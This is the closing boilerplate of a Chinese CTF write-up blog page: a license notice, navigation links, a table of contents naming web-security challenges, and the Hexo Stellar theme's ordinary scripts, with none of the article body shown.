      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">署名 - 非商业性使用 - 相同方式共享 4.0 国际</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    </div>
</article>
<div class="related-wrap" id="read-next"><section class="body"><div class="item" id="prev"><div class="note">Newer</div><a href="/2024/01/24/buuctf%E5%88%B7%E9%A2%982/">buuctf刷题2</a></div><div class="item" id="next"><div class="note">Older</div><a href="/2023/09/17/NSSCTF%E5%88%B7%E9%A2%981/">NSSCTF刷题1</a></div></section></div>






<footer class="page-footer footnote"><hr><div class="text"><p>本站由 <a href="/">Dr4x3zz</a> 使用 <a target="_blank" rel="noopener" href="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.29.1">Stellar 1.29.1</a> 主题创建。<br>
本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">



<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">On This Page</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#nisactf-2022easyssrf"><span class="toc-text"> [NISACTF 2022]easyssrf</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#nctf-2018%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="toc-text"> [NCTF 2018] 签到题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#bjdctf-2020easy_md5"><span class="toc-text"> [BJDCTF 2020]easy_md5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Beasyupload30"><span class="toc-text"> [SWPUCTF 2021 新生赛] easyupload3.0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bhardrce"><span class="toc-text"> [SWPUCTF 2021 新生赛] hardrce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Berror"><span class="toc-text"> [SWPUCTF 2021 新生赛] error</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#gxyctf-2019ping-ping-ping"><span class="toc-text"> [GXYCTF 2019]Ping Ping Ping</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bpop"><span class="toc-text"> [SWPUCTF 2021 新生赛] pop</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#litctf-2023ping"><span class="toc-text"> [LitCTF 2023]Ping</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bsql"><span class="toc-text"> [SWPUCTF 2021 新生赛] sql</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bfinalrce"><span class="toc-text"> [SWPUCTF 2021 新生赛] finalrce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#swpuctf-2022-%E6%96%B0%E7%94%9F%E8%B5%9Bez_ez_php"><span class="toc-text"> [SWPUCTF 2022 新生赛] ez_ez_php</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%B9%8F%E5%9F%8E%E6%9D%AF-2022%E7%AE%80%E5%8D%95%E5%8C%85%E5%90%AB"><span class="toc-text"> [鹏城杯 2022] 简单包含</span></a></li></ol></div><div class="widget-footer">

<a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 12c0-4.714 0-7.071 1.464-8.536C4.93 2 7.286 2 12 2c4.714 0 7.071 0 8.535 1.464C22 4.93 22 7.286 22 12c0 4.714 0 7.071-1.465 8.535C19.072 22 16.714 22 12 22s-7.071 0-8.536-1.465C2 19.072 2 16.714 2 12Z"/><path stroke-linecap="round" stroke-linejoin="round" d="m9 15.5l3-3l3 3m-6-4l3-3l3 3"/></g></svg><span>Scroll to Top</span></a></div></widget>
</div></aside><div class='float-panel blur'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">
<script type="text/javascript">
  const ctx = {
    date_suffix: {
      just: `Just`,
      min: `minutes ago`,
      hour: `hours ago`,
      day: `days ago`,
    },
    root : `/`,
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
  };
  const deps = {
    jquery: `https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.min.js`,
    marked: `https://cdn.jsdelivr.net/npm/marked@13.0.1/lib/marked.umd.min.js`
  }
  

</script>

<script type="text/javascript">
  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')){
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },
    
    onLoading: (el) => {
      if (el) {
        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      let retryTimes = 3;
      utils.onLoading(el);
      function req() {
        return new Promise((resolve, reject) => {
          let status = 0; // 0 等待 1 完成 2 超时
          let timer = setTimeout(() => {
            if (status === 0) {
              status = 2;
              timer = null;
              reject('请求超时');
              if (retryTimes == 0) {
                onFailure();
              }
            }
          }, 5000);
          fetch(url).then(function(response) {
            if (status !== 2) {
              clearTimeout(timer);
              resolve(response);
              timer = null;
              status = 1;
            }
            if (response.ok) {
              return response.json();
            }
            throw new Error('Network response was not ok.');
          }).then(function(data) {
            retryTimes = 0;
            utils.onLoadSuccess(el);
            callback(data);
          }).catch(function(error) {
            if (retryTimes > 0) {
              retryTimes -= 1;
              setTimeout(() => {
                req();
              }, 5000);
            } else {
              utils.onLoadFailure(el);
              onFailure();
            }
          });
        });
      }
      req();
    },
  };
</script>

<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>


<!-- required -->
<script src="/js/main.js?v=1.29.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    if (theme === 'auto') {
      document.documentElement.removeAttribute('data-theme')
    } else {
      document.documentElement.setAttribute('data-theme', theme)
    }

    applyThemeToGiscus(theme)
  }

  const applyThemeToGiscus = (theme) => {
    theme = theme === 'auto' ? 'preferred_color_scheme' : theme

    const cmt = document.getElementById('giscus')
    if (cmt) {
      // This works before giscus load.
      cmt.setAttribute('data-theme', theme)
    }

    const iframe = document.querySelector('#comments > section.giscus > iframe')
    if (iframe) {
      // This works after giscus loaded.
      const src = iframe.src
      const newSrc = src.replace(/theme=[\w]+/, `theme=${theme}`)
      iframe.src = newSrc
    }
  }

  const switchTheme = () => {
    // light -> dark -> auto -> light -> ...
    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    switch (currentTheme) {
      case 'light':
        newTheme = 'dark'
        break
      case 'dark':
        newTheme = 'auto'
        break
      default:
        newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)

    const messages = {
      light: `Switched to Light Mode`,
      dark: `Switched to Dark Mode`,
      auto: `Switched to Auto Mode`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    // Apply user's preferred theme, if any.
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    }
  })()
</script>


<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://cdn.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script defer src="https://cdn.jsdelivr.net/npm/vanilla-lazyload@19.1.3/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });
</script><script>
  ctx.fancybox = {
    selector: `.timenode p>img`,
    css: `https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.css`,
    js: `https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.umd.js`
  };
  var selector = '[data-fancybox]:not(.error)';
  if (ctx.fancybox.selector) {
    selector += `, ${ctx.fancybox.selector}`
  }
  var needFancybox = document.querySelectorAll(selector).length !== 0;
  if (!needFancybox) {
    const els = document.getElementsByClassName('ds-memos');
    if (els != undefined && els.length > 0) {
      needFancybox = true;
    }
  }
  if (needFancybox) {
    utils.css(ctx.fancybox.css);
    utils.js(ctx.fancybox.js, { defer: true }).then(function () {
      Fancybox.bind(selector, {
        hideScrollbar: false,
        Thumbs: {
          autoStart: false,
        },
        caption: (fancybox, slide) => {
          return slide.triggerEl.alt || slide.triggerEl.dataset.caption || null
        }
      });
    })
  }
</script>
<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3.1/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3.1/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->

</div></body></html>
